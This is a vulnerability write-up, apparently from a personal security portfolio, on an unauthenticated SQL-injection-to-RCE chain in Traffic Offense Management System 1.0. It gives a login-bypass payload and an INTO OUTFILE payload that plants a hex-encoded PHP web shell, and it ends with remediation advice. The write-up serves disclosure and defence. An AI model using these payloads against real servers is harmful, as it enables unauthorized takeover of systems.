Traffic Offense Management System 1.0 - SQLi to Remote Code Execution (RCE) (Unauthenticated)

Traffic Offense Management System 1.0 - SQLi to Remote Code Execution (RCE) (Unauthenticated)

Exploit / Project Details

Python Wed Aug 18 2021

Zero-Day Discovery & Exploit Development: Traffic Offense Management System

Detailed Write-up

Introduction

In this report, we will examine a critical Remote Code Execution (RCE) vulnerability discovered in the "Traffic Offense Management System 1.0". This vulnerability allows an unauthenticated attacker to completely compromise the server. The attack chain begins with an SQL Injection to bypass the authentication mechanism, followed by another SQL Injection (INTO OUTFILE) to write a malicious PHP file to the server.

Vulnerability Analysis

Phase 1: Authentication Bypass (SQL Injection)

The first step of the attack is to gain access to the administration panel. The application's login mechanism is located in classes/Login.php.

// classes/Login.php
$qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");

As seen, the $username variable is directly included in the SQL query. This is a classic SQL Injection vulnerability.

Payload Used: admin' or '1'='1'#

When this payload is sent, the query becomes:

SELECT * from users where username = 'admin' or '1'='1'#' and password = md5('...')

Since this query always returns true, the attacker can log in as the administrator without knowing the password.

Phase 2: Path Disclosure

To write a file, we need to know the absolute path on the server. The id parameter in admin/drivers/manage_driver.php is also vulnerable to SQL injection.

// admin/drivers/manage_driver.php
$qry = $conn->query("SELECT * from `drivers_list` where id = '{$_GET['id']}' ");

If a single quote (') is sent to the id parameter, the SQL syntax breaks, and PHP returns a Warning message. This message contains the full path of the file on the server.

Phase 3: Remote Code Execution (SQL Injection - INTO OUTFILE)

Once the path is known, we can use the same SQL injection point (admin/drivers/manage_driver.php) to write a file to the server. MySQL's INTO OUTFILE feature is used to write query results to a file.

Payload Used:

' LIMIT 0,1 INTO OUTFILE '/var/www/html/admin/shell.php' LINES TERMINATED BY 0x3c3f7068702073797374656d28245f4745545b27636d64275d293b203f3e -- -

This payload writes the query result (or rather, the PHP code specified by LINES TERMINATED BY) to the specified path on the server. The hex-encoded part corresponds to <?php system($_GET['cmd']); ?>.

Exploit Development

The developed Python script (50244.py) automates the following steps:

  1. Login Bypass: Logs in by sending an SQLi payload to classes/Login.php.
  2. Driver ID Detection: Scrapes admin/?page=drivers to find a valid driver ID. This ID is required for the subsequent SQL injection.
  3. Path Detection: Sends a malformed ID to the manage_driver page and parses the returned error message to find the server's full path.
  4. Shell Upload: Uses the INTO OUTFILE technique to write a PHP file with a random name to the detected path.
  5. Command Execution: Sends a request to the uploaded PHP file to execute the whoami command and prints the result.

Remediation

To fix these vulnerabilities:

  1. Prepared Statements: Parameterized queries must be used in all database queries.

    Vulnerable:

    $qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");

    Secure:

    $stmt = $this->conn->prepare("SELECT * from users where username = ? and password = md5(?)");
$stmt->bind_param("ss", $username, $password);
$stmt->execute();
$qry = $stmt->get_result();

  2. Disable Error Display: display_errors should be turned off in production systems.

  3. Database Privileges: The FILE privilege (file read/write) should be revoked from the database user.

Source Code Explorer
/
Select a file
2024 © Tağmaç Han